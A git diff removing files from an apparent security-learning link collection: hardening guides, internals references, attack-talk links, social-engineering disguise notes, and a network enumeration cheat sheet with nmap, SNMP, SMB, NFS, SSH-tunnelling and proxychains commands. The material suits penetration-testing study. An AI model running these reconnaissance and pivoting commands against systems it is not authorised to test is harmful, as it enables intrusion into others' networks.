Changed structure

7 years ago · 301138fdec
--- a/Draft/Draft/Draft/Anonymity.md
+++ b/Draft/Draft/Draft/Anonymity.md
--- a/Draft/Draft/Draft/AppSec.md
+++ b/Draft/Draft/Draft/AppSec.md
--- a/Draft/Draft/Draft/Attacking
+++ b/Draft/Draft/Draft/Attacking
--- a/Draft/Draft/Draft/Attacking
+++ b/Draft/Draft/Draft/Attacking
--- a/Draft/Draft/Draft/Basic
+++ b/Draft/Draft/Draft/Basic
--- a/Draft/Draft/Draft/Building
+++ b/Draft/Draft/Draft/Building
--- a/Draft/Draft/Draft/Building
+++ b/Draft/Draft/Draft/Building
--- a/Draft/Draft/Draft/CTFs
+++ b/Draft/Draft/Draft/CTFs
--- a/Draft/Draft/Draft/Cheat
+++ b/Draft/Draft/Draft/Cheat
--- a/Draft/Draft/Draft/Client
+++ b/Draft/Draft/Draft/Client
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Common
+++ b/Draft/Draft/Draft/Common
--- a/Draft/Draft/Draft/Computer
+++ b/Draft/Draft/Draft/Computer
--- a/Draft/Draft/Draft/Con
+++ b/Draft/Draft/Draft/Con
--- a/Draft/Draft/Draft/Counter
+++ b/Draft/Draft/Draft/Counter
--- a/Draft/Draft/Draft/CryptoCurrencies.md
+++ b/Draft/Draft/Draft/CryptoCurrencies.md
--- a/Draft/Draft/Draft/Cryptography
+++ b/Draft/Draft/Draft/Cryptography
--- a/Draft/Draft/Draft/Cryptography
+++ b/Draft/Draft/Draft/Cryptography
--- a/Draft/Draft/Draft/Cryptography
+++ b/Draft/Draft/Draft/Cryptography
--- a/Draft/Draft/Draft/Cryptography
+++ b/Draft/Draft/Draft/Cryptography
--- a/Draft/Draft/Draft/Darknets.md
+++ b/Draft/Draft/Draft/Darknets.md
--- a/Draft/Draft/Draft/Data
+++ b/Draft/Draft/Draft/Data
--- a/Draft/Draft/Draft/Databases.md
+++ b/Draft/Draft/Draft/Databases.md
--- a/Draft/Draft/Draft/Disclosure.md
+++ b/Draft/Draft/Draft/Disclosure.md
--- a/Draft/Draft/Draft/Disinformation.md
+++ b/Draft/Draft/Draft/Disinformation.md
--- a/Draft/Draft/Draft/Documentation
+++ b/Draft/Draft/Draft/Documentation
--- a/Draft/Draft/Draft/Draft.rtf
+++ b/Draft/Draft/Draft/Draft.rtf
--- a/Draft/Draft/Draft/Lockpicking.md
+++ b/Draft/Draft/Draft/Lockpicking.md
@ -1,12 +0,0 @@
 ##Lockpicking




 Lockingpicking sites:
 	Tool
 	lockpicking101



 [Newbies guide to picking safes](http://cybergibbons.com/lockpicking-2/a-newbies-guide-to-safes/)
--- a/Draft/Draft/Draft/Securing
+++ b/Draft/Draft/Draft/Securing
@ -1,97 +0,0 @@
 Who is the target audience for this?

 The intended target audience for the following information is not anyone trying to escape an oppressive regime or someone trying to avoid compromise from a nation-state entity. 

 It is intended as a guide for the lowest common denominator. I’m not going to write out a super long/secure guide only to have ten people use it. If you’re looking for a more effective hardening guide for windows, please check out these links:

 Hardening Windows 7: http://hardenwindows7forsecurity.com/index.html
 Hardening Windows 8: http://hardenwindows8forsecurity.com/
 Center for Internet Security(CIS) Guides to System Hardening:
 http://benchmarks.cisecurity.org/downloads/browse/index.cfm?category=benchmarks.os.windows

 With that said, most issues can be avoided through keeping your system up to date with Windows Update Services, not installing software from unknown locations, and not installing Flash or Java unless you must. 

 Securing Windows Desktop

 Make sure your system has the latest updates and patches available through Windows Update Service.

 Create a baseline configuration.
 I advise that you create a security baseline once you have applied the latest patches and updates. This allows you to have a point of reference to work from. From this, you can start planning on what specific techniques you will use to harden your system.

 Microsoft Baseline Security Analyzer Tool
 http://technet.microsoft.com/en-us/security/cc184924.aspx
 MBSA FAQs
 http://technet.microsoft.com/en-us/security/cc184922

 Install the Exploit Mitigation Enhancement Toolkit.
 It is recommended you install the Exploit Mitigation Enhancement Toolkit provided at no cost by Microsoft. It is a piece of software that reduces the effectiveness of exploits used by malware through various mitigation techniques. More information can be found here: 
 http://support.microsoft.com/kb/2458544

 EMET Tutorial on installation/configuration
 http://www.dedoimedo.com/computers/windows-emet-v4.html

 EMET Homepage: 
 http://technet.microsoft.com/en-us/security/jj653751

 Download link(EMET 5.0):
 http://www.microsoft.com/en-us/download/details.aspx?id=43714 

 Windows Firewall
 Windows firewall is enabled by default
 By default it is set to implicit deny on incoming packets, and implicit allow for outgoing packets. 
 For a guide on configuring Windows firewall, check out Microsoft’s guide: 
 http://technet.microsoft.com/en-us/library/jj721516.aspx
 Also, Windows Firewall configuration through Powershell http://technet.microsoft.com/en-us/library/hh831755.aspx

 Anti-Virus
 AV. I will go on record, as saying that I do recommend some form of Anti-Virus. As for which one in particular, I will not say. I will however provide a link to comparisons of various AV:
 http://www.av-test.org/en/home/

 Web Browser
 Firefox
 If you really need to be told what Firefox is, I don’t even.
 https://www.mozilla.org/en-US/firefox/new/
 Firefox Plugins
 One of the beautiful things Firefox are the plugins, and the extra functionality added through them. The list below is my recommendations for securing your browser as well as controlling what information it sends out.
 Adblock - Blocks ads. Ads are a large vector of attack due to the lack of verification within the advertising industry.
 Link: https://addons.mozilla.org/en-US/firefox/addon/adblock-edge/
 Noscript - Allows for granular control of Javascript on pages.
 Link: https://addons.mozilla.org/en-US/firefox/addon/noscript/
 Request Policy - Control the HTTP requests made by your browser to 3rd party websites.
 Link: https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/ 
 Self destructing cookies - Prevent tracking and abuse of session information.
 Link: https://addons.mozilla.org/en-US/firefox/addon/self-destructing-cookies/
 HTTPS Everywhere - Forces sites when possible to use HTTPS encryption.
 Link: https://www.eff.org/https-everywhere


 Analyzing the Attack Surface(Only on Win7/Serv08 and below)
 	Release Announcement/Download:
 		http://blogs.msdn.com/b/sdl/archive/2012/08/02/attack-surface-analyzer-1-0-released.aspx

 	Using the Attack Surface Analyzer:
 		http://technet.microsoft.com/en-us/security/gg749821.aspx
 Attack Surface Analyzer is a Microsoft verification tool designed to catalog changes in system state, runtime parameters, and securable objects on the Windows operating system.  This analysis helps identify any increase in the attack surface that is caused by installing applications.  Developed by the Security Engineering group team, Attack Surface Analyzer is the first tool of its kind available for public use, and it runs on the Windows Vista, Windows 7, and Windows Server 2008 operating systems.


 Encryption
 Check the Encryption section of the overall guide for more information.



















--- a/Draft/Draft/Draft/Securing
+++ b/Draft/Draft/Draft/Securing
@ -1,28 +0,0 @@
 Hardening Windows Server


 Firstly, if you are reading this hoping to learn how to harden production servers, stop what you’re doing, walk on over to HR, and hand in your notice.

 For anyone who *isn’t* trying to harden production servers, please read this:

 http://blogs.technet.com/b/mspfe/archive/2014/05/29/why-you-should-avoid-manual-server-hardening.aspx

 In, fact, even if you don’t, you should still read it. It lists several common gotchas that plague people new to hardening. 

 Having read that, here is Microsoft’s Security Compliance Manager wiki:
 	http://technet.microsoft.com/en-in/solutionaccelerators/cc835245.aspx
 It supports Windows 7, Vista, Server 2008 and Server 2012.

 Keep in mind that any server hardening should be custom tailored to your operation and environment. You can’t simply take a one-size fits all approach.


 Some Links:

 Server Baseline hardening:
 	http://technet.microsoft.com/en-us/library/cc526440.aspx

 Server 2008 Hardening Checklist: 
 	https://wikis.utexas.edu/display/ISO/Windows+2008R2+Server+Hardening+Checklist

 Hardening Server 08 from Microsoft:
 	http://technet.micro soft.com/en-us/library/cc995076.aspx
--- a/Draft/Draft/Draft/Securing
+++ b/Draft/Draft/Draft/Securing
--- a/Draft/Draft/Draft/Securing
+++ b/Draft/Draft/Draft/Securing
@ -1,20 +0,0 @@
 List of Hardening Guides for iOS



 Guides/Checklist

 Excellent forum post detailing general security practices:
 	https://forum.raymond.cc/threads/hardening-apple-ios-iphone-ipad-ipod.37451/

 Apple’s white paper on their security mechanisms built into iOS:	https://images.apple.com/ipad/business/docs/iOS_Security_Feb14.pdf

 University of Texas’s Checklist/Guide to securing iOS:	https://wikis.utexas.edu/display/ISO/Apple+iOS+Hardening+Checklist

 Center for Internet Security Guide to securing iOS 7:	https://benchmarks.cisecurity.org/tools2/iphone/CIS_Apple_iOS_7_Benchmark_v1.1.0.pdf

 Australian Signals Intel Guide to securing iOS 7:	http://www.asd.gov.au/publications/iOS7_Hardening_Guide.pdf

 Excellent forum post detailing general security practices:
 	https://forum.raymond.cc/threads/hardening-apple-ios-iphone-ipad-ipod.37451/

--- a/Draft/Draft/Draft/Securing
+++ b/Draft/Draft/Draft/Securing
--- a/Draft/Draft/Draft/Simulations.md
+++ b/Draft/Draft/Draft/Simulations.md
@ -1,8 +0,0 @@


 [Shadow](http://shadow.github.io/)
 * Summary: Shadow is a unique, open source discrete-event network simulator that runs real applications like Tor. Shadow combines the accuracy of emulation with the efficiency and control of simulation, achieving the best of both approaches 


 [Hflow2](https://projects.honeynet.org/hflow)
 * Data Analysis System
--- a/Draft/Draft/Draft/Social
+++ b/Draft/Draft/Draft/Social
@ -1,87 +0,0 @@
 Social Engineering








 [DiSC Overview](https://www.discprofile.com/what-is-disc/overview/)
 * DiSC is a personal assessment tool used to improve work productivity, teamwork and communication. DiSC is non-judgmental and helps people discuss their behavioral differences.



 DEF CON 22 Hacking Conference Presentation By Chris Hadnagy - What Your Body Tells Me - Body Language for the SE - Video and Slides.m4v
 https://media.defcon.org/DEF%20CON%2022/DEF%20CON%2022%20video%20and%20slides/DEF%20CON%2022%20Hacking%20Conference%20Presentation%20By%20Chris%20Hadnagy%20-%20What%20Your%20Body%20Tells%20Me%20-%20Body%20Language%20for%20the%20SE%20-%20Video%20and%20Slides.m4v







 Research Papers

 [Construal-Level Theory of Psychological Distance](http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3152826/)
 * Abstract: People are capable of thinking about the future, the past, remote locations, another person’s perspective, and counterfactual alternatives. Without denying the uniqueness of each process, it is proposed that they constitute different forms of traversing psychological distance. Psychological distance is egocentric: Its reference point is the self in the here and now, and the different ways in which an object might be removed from that point—in time, in space, in social distance, and in hypotheticality—constitute different distance dimensions. Transcending the self in the here and now entails mental construal, and the farther removed an object is from direct experience, the higher (more abstract) the level of construal of that object. Supporting this analysis, research shows (a) that the various distances are cognitively related to each other, (b) that they similarly influence and are influenced by level of mental construal, and (c) that they similarly affect prediction, preference, and action.

 Books, Articles & Presentations

 http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3152826/


 Articles
 Source Gathering:
 http://guerrillamerica.com/2014/01/source-handling-part-one/
 http://guerrillamerica.com/2013/12/source-recruitment/


 Books
 Art of Deception
 Art of the Steal
 Craft of Intelligence
 Miss Manners guide to proper manners
 Social Engineering: Art of Human Hacking
 What EveryBODY is saying



 http://westsidetoastmasters.com/resources/book_of_body_language/toc.html
 Toastmaster's guide to body language


 Presentations:

 http://www.ted.com/talks/amy_cuddy_your_body_language_shapes_who_you_are/transcript

 [Disguise - Appearance Hacking](http://www.irongeek.com/i.php?page=videos/derbycon2/valerie-thomas-appearance-hacking-101-the-art-of-everyday-camouflage)

 My notes from it: Why use makeup?
     Blend into crow
     Pose as employee/vendor
     Regain access if caught
     Create distraction for teammates
 Whom to disguise as?
     Technician
     Sales Executive
 Goodwill
     Employee
     Interview Candidate
 Easy to see goings on
     Pedestrian
     Sidewalk Sleeper
 Transform into another person:
     Can take minutes/hours
     Examine each physical attribute
 Some modified easier than others
     Entire appearance makes the difference. One part is off, whole cover can be blown
 If using hardhat, make sure to beat the shit out of it. Add stickers. 








--- a/Draft/Draft/Draft/Software
+++ b/Draft/Draft/Draft/Software
@ -1,5 +0,0 @@
 Dongles


 FunCube dongle
 http://www.funcubedongle.com/
--- a/Draft/Draft/Draft/Software
+++ b/Draft/Draft/Draft/Software
@ -1,15 +0,0 @@
 Software Defined Radio









 http://www.irongeek.com/i.php?page=videos/defcon-wireless-village-2014/14-hacking-the-wireless-world-with-software-defined-radio-2-0-balint-seeber


 So you want to get into SDR talk
 www.irongeek.com/i.php?page=videos/defcon-wireless-village-2014/01-so-ya-wanna-get-into-sdr-russell-handorf
--- a/Draft/Draft/Draft/Software
+++ b/Draft/Draft/Draft/Software
--- a/Draft/Draft/Draft/Steal
+++ b/Draft/Draft/Draft/Steal
@ -1,50 +0,0 @@
 ##Steal Everything; Kill Everyone; Profit!
 ###j/k please don’t :3


 ####[Too Many Cooks; Exploiting the Internet of Tr-069](http://mis.fortunecook.ie/) 

 ####[Ever wanted to scan the internet in a few hours?](http://blog.erratasec.com/2013/10/faq-from-where-can-i-scan-internet.html)

 ####[The Eavesdropper’s Dillemma](http://www.crypto.com/papers/internet-tap.pdf)

 ####Coding Malware for fun and no profit
 * [Git Page](https://github.com/MalwareTech/TinyXPB)
 * [TinyXPB-Winxp Bootkit](http://www.scribd.com/doc/217533462/TinyXPB-Windows-XP-32-Bit-Bootkit)
 * [Writing Malware for fun but not profit](http://www.malwaretech.com/2014/04/coding-malware-for-fun-and-not-for.html)

 ####[Use google bots to perform SQL injections on websites](http://blog.sucuri.net/2013/11/google-bots-doing-sql-injection-attacks.html)

 ####[Device Pharmer](https://github.com/DanMcInerney/device-pharmer)

 ####[Door Control Systems: An Examination of Lines of Attack](https://www.nccgroup.com/en/blog/2013/09/door-control-systems-an-examination-of-lines-of-attack/)

 ####[Implanting a Dropcam](https://www.defcon.org/images/defcon-22/dc-22-presentations/Moore-Wardle/DEFCON-22-Colby-Moore-Patrick-Wardle-Synack-DropCam-Updated.pdf)

 ####[Breaking IPMI/BMC](http://fish2.com/ipmi/how-to-break-stuff.html)

 ####[Achilles Heel of the American Banking System](http://www.irongeek.com/i.php?page=videos/derbycon4/the-achilles-heel-of-the-banking-system)

 ####[Different Type of SCADA](http://scadastrangelove.blogspot.com/2014/10/different-type-of-scada.html)



 ####[Attacking *multifunction* printers and getting creds from them](www.irongeek.com/i.php?page=videos/bsidescleveland2014/plunder-pillage-and-print-the-art-of-leverage-multifunction-printers-during-penetration-testing-deral-heiland)



 ####[Spidernet](https://github.com/wandering-nomad/Spidernet)
 * Proof of Concept of SSH Botnet C&C Using Python 



 ####[Weapons of Mass Distraction](http://conference.hitb.org/hitbsecconf2014kul/materials/D2T1%20-%20Haroon%20Meer%20Azhar%20Desai%20and%20Marco%20Slaviero%20-%20Weapons%20of%20Mass%20Distraction.pdf)
 * In this talk, we aim to briefly cover the background of sock puppets (and related attacks) before moving on to real world demonstrations & “attacks“. Rigging polls, abusing Twitter, causing Reddit riots & targeting popular news organisations are some of the (many) attacks covered. In all these cases we discuss what we tried, what worked, what didn’t and what the implications are of the attacks. Where possible we will cover defences and solutions.



 ####[Adding your protocol to Masscan](http://blog.erratasec.com/2014/11/adding-protocols-to-masscan.html)




--- a/Draft/Draft/Draft/SysAdmin/SysAdmin.rtf
+++ b/Draft/Draft/Draft/SysAdmin/SysAdmin.rtf
--- a/Draft/Draft/Draft/SysAdmin/Windows.txt
+++ b/Draft/Draft/Draft/SysAdmin/Windows.txt
@ -1,71 +0,0 @@

 [Mitigating Pass-the-Hash Attacks and other credential Theft-version2](http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf)
 * Official MS paper.

 [Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx)

 [Second section good resource for hardening windows](http://labs.bitdefender.com/2014/11/do-your-bit-to-limit-cryptowall/)

 [Windows ISV Software Security Defenses](https://msdn.microsoft.com/en-us/library/bb430720.aspx)


 Delta Copy](http://www.aboutmyip.com/AboutMyXApp/DeltaCopy.jsp)
 * In technical terms, DeltaCopy is a "Windows Friendly" wrapper around the Rsync program, currently maintained by Wayne Davison. "rsync" is primarily designed for Unix/Linux/BSD systems. Although ports are available for Windows, they typically require downloading Cygwin libraries and manual configuration. 

 [The 10 Windows group policy settings you need to get right](http://www.infoworld.com/article/2609578/security/the-10-windows-group-policy-settings-you-need-to-get-right.html?page=2)


 [Windows Performance Toolkit Reference](http://msdn.microsoft.com/en-us/library/windows/hardware/hh162945.aspx)

 [Harden windows IP Stack](https://www.reddit.com/r/netsec/comments/2sg80a/how_to_harden_windowsiis_ssltls_configuration/
 )



 [GPO Best Policies](http://www.grouppolicy.biz/best-practices/)


 [Understanding DEP as a mitigation Technology](http://blogs.technet.com/b/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx)
 [Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP](http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx)


 [Windows Firewall Hook Enumeration](https://www.nccgroup.com/en/blog/2015/01/windows-firewall-hook-enumeration/)
 * We’re going to look in detail at Microsoft Windows Firewall Hook drivers from Windows 2000, XP and 2003. This functionality was leveraged by the Derusbi family of malicious code to implement port-knocking like functionality. We’re going to discuss the problem we faced, the required reverse engineering to understand how these hooks could be identified and finally how the enumeration tool was developed.





 [15 Ways to bypass Powershell execution-policy settings](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
 * Does what it says on the tin. Overall, its clear that execution-policy was not meant as a security method. Or if it was, someone was drinking a bit too much.



 http://www.grouppolicy.biz/2011/06/best-practices-group-policy-for-wsus/

 	https://media.blackhat.com/us-13/US-13-Duckwall-Pass-the-Hash-Slides.pdf
 Protecting against Pass-The-Hash and other techniques

 http://www.scriptjunkie.us/2013/06/fixing-pass-the-hash-and-other-problems/


 Cached Domain Credentials


 Mitigating Kerberos Golden Tickets:
 http://cert.europa.eu/static/WhitePapers/CERT-EU-SWP_14_07_PassTheGolden_Ticket_v1_1.pdf


 https://sysforensics.org/2014/01/know-your-windows-processes.html 


 https://bettercrypto.org/static/applied-crypto-hardening.pdf









--- a/Draft/Draft/Draft/System
+++ b/Draft/Draft/Draft/System
@ -1,95 +0,0 @@







 CULL


 [Linux Kernel Explanation/Walk through](http://www.faqs.org/docs/Linux-HOWTO/KernelAnalysis-HOWTO.html)



 [Know your Windows Processes or Die Trying](https://sysforensics.org/2014/01/know-your-windows-processes.html)
 * Excellent quick reference on Windows proccesses with a focus on Win7. Good resource.



 [Windows Program Automatic Startup Locations](http://www.bleepingcomputer.com/tutorials/windows-program-automatic-startup-locations/)





 ###Windows 



 [Application Compatibility in Windows](https://technet.microsoft.com/en-us/windows/jj863248)

 [Introduction to Windows Kernel Security](http://blog.cmpxchg8b.com/2013/05/introduction-to-windows-kernel-security.html)
 [Technical Overview of Windows UEFI Startup Process](http://news.saferbytes.it/analisi/2013/10/windows-uefi-startup-a-technical-overview/)
 [Windows 8 BOot](http://technet.microsoft.com/en-US/windows/dn168167.aspx)
 [Windows 8 ASLR Explained](http://blog.ptsecurity.com/2012/12/windows-8-aslr-internals.html)
 [Collection of Windows Autostart locations](http://gladiator-antivirus.com/forum/index.php?showtopic=24610]
 [Inside the Windows Vista Kernel: Part 1](http://technet.microsoft.com/en-us/magazine/2007.02.vistakernel.aspx)


 [How Control Flow Guard Drastically Caused Windows 8.1 Address Space and Behavior Changes](http://www.alex-ionescu.com/?p=246)



 [Pushing the Limits of Windows: Virtual Memory](http://blogs.technet.com/b/markrussinovich/archive/2008/11/17/3155406.aspx)

 ###Linux



 Linux References


 [Memory Management: Paging](https://www.cs.rutgers.edu/~pxk/416/notes/09a-paging.html)


 [Linux Device Drivers book](http://www.makelinux.net/ldd3/)
 [X Window System Explained](https://magcius.github.io/xplain/article/index.html)

 [Understanding the ELF](https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571)
 [Linkers and Loaders - Book](http://www.iecc.com/linker/)
 * These are the manuscript chapters for my Linkers and Loaders, published by Morgan-Kaufman. See the book's web site for ordering information. 
 * All chapters are online for free at the above site.


 [ELF Format](http://www.skyfree.org/linux/references/ELF_Format.pdf)
 [Linker and Libraries](http://docs.oracle.com/cd/E19457-01/801-6737/801-6737.pdf)

 Linux Filesystem infographic
 * [Part 1](http://i.imgur.com/EU6ga.jpg)
 * [Part 2](http://i.imgur.com/S5Ds2.jpg)




 [Anatomy of a program in memory](http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/) 
 * Writeup on the structure of program memory in Linux.

 [How the Kernel manages Memory - Linux](http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/)





 [Linux Documentation Project](http://www.tldp.org/)

 [Introduction to Linux - Machtelt Garrels](http://www.tldp.org/LDP/intro-linux/html/intro-linux.html)
 * Excellent doc covering every aspect of linux. Deserves at least 1 skim through.

 [Bash Guide for Beginners](http://www.tldp.org/LDP/Bash-Beginners-Guide/html/Bash-Beginners-Guide.html)






--- a/Draft/Draft/Draft/Threat
+++ b/Draft/Draft/Draft/Threat
@ -1,8 +0,0 @@
 Threat Modeling





 Guerrilla Threat Modelling (or 'Threat Modeling' if you're American)
 http://blogs.msdn.com/b/ptorr/archive/2005/02/22/guerillathreatmodelling.aspx`
--- a/Draft/Draft/Draft/To
+++ b/Draft/Draft/Draft/To
@ -1,198 +0,0 @@
 4



 From:
 http://it-ovid.blogspot.com/2012/02/enumeration-and-reconnaissance.html

 Network Enumeration and Scanning Cheat sheet


 Network Scanning and Mapping

 ------------------------------------------------------------------------
 Network Service Discovery
 Nmap
 nmap -sSV -vv -PN --send-ip -A -O -oG <address-range>_`date +%Y-%m-%d_%H:%M` <address-range>nmap -A -vv -PN --send-ip -oG <address-range>_`date +%Y-%m-%d_%H:%M` <address-range>

 Unicorn Scan

 us -H -msf -Iv <address> -p 1-65535
 us -H -mU -Iv <address> -p 1-65535

 Layer 2 - Arp - netdiscover
 netdiscover -i <interface> -r <address-range>

 ------------------------------------------------------------------------
 TCPDump Sniffing

 tcpdump -s0 -xxXX -vv -i eth0 'host <address> and (dst port <num> or <num> )' | tee <address>_<service>_`date +%Y-%m-%d_%H:%M`.txt
 or save the pcap file with additional flag (filename shortcut):

 -w <address>_<service>_`date +%Y-%m-%d_%H:%M`.pcap


 Locate VLAN Tagstcpdump -vv -i <interface> -s &ltsnap-length> -c <num-packet-count> 'ether[20:2] == 0x2000'

 ------------------------------------------------------------------------ 
 Specific Service Queries


 DNS TCP:53/UDP:53
 DNS  TCP and UDP 53 - DNS walking and Zone transfers
 dig <domain> @<dns-server> AXFR | tee dns_<domain>_axfr._`date +%Y-%m-%d_%H:%M`.txt


 DNS  TCP and UDP 53 - DNS cache poisoning check
 dig +short @<dns-server> porttest.dns-oarc.net txt
 porttest.y.x.w.v.u.t.s.r.q.p.o.n.m.l.k.j.i.h.g.f.e.d.c.b.a.pt.dns-oarc.net.
 "<dns-server> is GREAT: 26 queries in 4.4 seconds from 26 ports with std dev 22336"

 ------------------------------------------------------------------------
 HTTP Web applications TCP 80,8000
 nikto -h -p -C all -Display D -output nikto_<target-server><port>_`date +%Y-%m-%d_%H:%M`.txt -Format txt


 DirBuster
 cd /pentest/web/dirbuster && java -jar DirBuster-0.12.jar

 WFuzz
 wfuzz.py -c -z file,<wordlist> --hc 404 -o <html|magictree> http://<site-url>/FUZZ
 e.g.
 ./wfuzz.py -c -z file,/pentest/passwords/wordlists/combined --hc 404 -o html http://<site-url>/FUZZ 2> /dev/null

 HTTP commands for webserver enumeration 
 nc <target-address> <port>
 HEAD / HTTP/1.0
 or
 OPTIONS / HTTP/1.0
 or
 TRACE / HTTP/1.0



 WebDAV

 IIS 6.0



 HTTPS/SSL  TCP 443
 openssl s_client -connect <target-server>443 -state -debug
 HEAD / HTTP/1.0

 CONNECTED(00000003)
 SSL_connect:before/connect initialization
 ... ... ... cut ... ... ... 
 SSL_connect:SSLv3 write client key exchange A
 ... ... ... cut ... ... ... 
 HTTP/1.1 302 Found
 Date: Mon 02 Apr 2012 06:53:49 GMT
 Server IBM_HTTP_Server/6.0.2.33 Apache/2.0.47 (Unix)
 ... ... ... cut ... ... ...

 ------------------------------------------------------------------------
 SNMP commands UDP 161

 SNMPWalk
 snmpwalk -c public -v[1|2c] <target-server> | tee <address>_snmp_`date +%Y-%m-%d_%H:%M`.txt

 SNMPv2-MIB::sysDescr.0 = STRING: hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
 SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.58.1.1.1.2.1
 DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (24030770) 2 days, 18:45:07.70
 SNMPv2-MIB::sysContact.0 = STRING: System contact unknown at this time
 SNMPv2-MIB::sysName.0 = STRING: 
 SNMPv2-MIB::sysLocation.0 = STRING: System location unknown at this time
 SNMPv2-MIB::sysServices.0 = INTEGER: 72
 ... ... ...


 SNMPEnum
 /snmpenum.pl public linux.txt 
    UPTIME... ... ...
    HOSTNAME... ... ...
    RUNNING SOFTWARE PATHS
 ... ... ...
    RUNNING PROCESSES... ... ...
    MOUNTPOINTS... ... ...
    SYSTEM INFO
 ... ... ...
    LISTENING UDP PORTS
 ... ... ...    LISTENING TCP PORTS

 OneSixtyOne
 ./onesixtyone -c <dictionary-file> -i <hosts-file> -o <address-range>_snmp_`date`.log -w
 ./onesixtyone <target-address>
 Scanning 1 hosts, 2 communities [public] hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software


 SNMPCheck
 ./snmpcheck-1.8.pl -c <community-name> -v <version 1,2> -t <address-range>
 snmpcheck.pl v1.8 - SNMP enumerator
 Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)
 [*] Try to connect to 
 [*] Connected to 
 [*] Starting enumeration at 2011-07-25 10:32:58
 [*] System information
 -----------------------------------------------------------------------------------------------
 Hostname               :
 Description            : hp AlphaServer ES80 7/1000, VMS V7, MultiNet(R) for OpenVMS V4.4, Copyright (c) 2001 Process Software
 Uptime system          : 0.00 seconds
 Uptime SNMP daemon     : 2 days, 18:17:07.01
 [*] Network information
 ... ... ...
 [*] Network interfaces
 ... ... ...
 [*] Routing information
 ... ... ...
 [*] Listening TCP ports and connections
 ... ... ...


 ------------------------------------------------------------------------
 Samba/CIFS/NETBIOS TCP 135,139,445
 nbtscan -v -s : -r <address-range> | tee <address-range>_nbtscan_`date +%Y-%m-%d_%H:%M`.txt


 SMBClient - Discover and mount shares

 smbclient -L \\\<target-address>\\ -U <Username>
 smbclient -U <Username> -W <Workgroup> \\\\<target-address>\\\<sharename>

 ------------------------------------------------------------------------
 RPC, PortMapper and NFS TCP/UDP:111
 rpcinfo -p >target-address> | tee <address>_rpcinfo_`date +%Y-%m-%d_%H:%M`.txt



 showmount -e <ip-address>


 mount <ip-address>:<exported_path> <local_path>


 Tunnelling and Pivoting
 ------------------------------------------------------------------------
 SSH Tunnelling and pivoting 


 ssh -v -f -N -L <localIP>:<local-port>:<dest-ip>:<dest-port> <user>@&ltpivot-host> -i <authentication-key-file>
 Verbosity (-v),  Background (-f), No command execution (-N), Local port forwarding (-L)

 Forward localhost port 25 to the localhost of 192.168.1.6 using ssh DSA key   

 ssh -v -f -N -L 127.0.0.1:25:127.0.0.1:25 user@192.168.1.6 -i /dsa/1024/f1fb2162a02f0f7c40c210e6167f05ca-16858

 Proxy Chains 
 Dual-honed proxies or for proxying some port-scans
 Edit the configuration file:
 /etc/proxychains.conf
 Under the ProxyList section:

 [ProxyList]
 http <proxy-server-ip> <port>
 Execute with:
 proxychains &ltsocket-aware command>
 e.g
 proxychains nmap -sT -vv --send-ip -pT:21,22,25,80,443,445,3389 <target-address> 
 Posted 22nd February 2012 by Tim Arneaud 
--- a/Draft/Draft/Draft/To
+++ b/Draft/Draft/Draft/To
@ -1,76 +0,0 @@
 Android - Encryption
 Android - Analyzing Attack Surface

 Appsec

 Computer Hardware attacks - General

 Con Videos - Add Defcon Archive; Shmoocon/Ruxcon/etc.

 Counter Surveillance - Legit info

 Crypto Currencies - In general

 Crypto - General/form 


 Darknets - More than just reddit

 Data Visualization - More in general

 Disclosure - Some historical things

 Forensics - Integrate from cull list

 Fuzzing - Educational stuff; more writeups

 Google Hacking - Completely empty

 Honeypots - More

 Lockpicking - needs fucks

 Logging - More for all

 Malware - Structure, clean out cull

 Network Attacks and Defense - Structure, clean out cull, add more

 Recon - Structure/more/cull

 OSINT - Structure/clean out cull

 Passwords - Clean out cull/structure/more

 Phishing Under Client Side Attacks

 Persistence - Needs some lovin

 Programming - Some stuff

 Pwning Skiddies - meh/Needs more

 Reverse Engineering - Structure/clean out cull/more

 Rootkits - Needs more/Structure

 Securing & Hardening - Structure/simplify

 Social Engineering - Could do with a touch up

 SDR - needs work

 SysInternals - Always use more

 Tor - Needs mo

 Threat Modeling - Needs more

 UX/Design - Could do with a few more links

 Sysadmin - Always more

 WebApp - Structure/cleanup/clear out cull

 Wireless Networks - More info/structure

--- a/Draft/Draft/Draft/To
+++ b/Draft/Draft/Draft/To
--- a/Draft/Draft/Draft/To
+++ b/Draft/Draft/Draft/To
@ -1,101 +0,0 @@
 Elaborate on packers

 http://waleedassar.blogspot.com/
 https://github.com/isislab/Project-Ideas/wiki/Program-Analysis
 https://github.com/isislab/Project-Ideas/wiki/Embedded-Device-Security
 https://github.com/isislab/Project-Ideas/wiki/Application-Security



 [Thousands of MongoDB installations on the net unprotected](http://cispa.saarland/wp-content/uploads/2015/02/MongoDB_documentation.pdf)




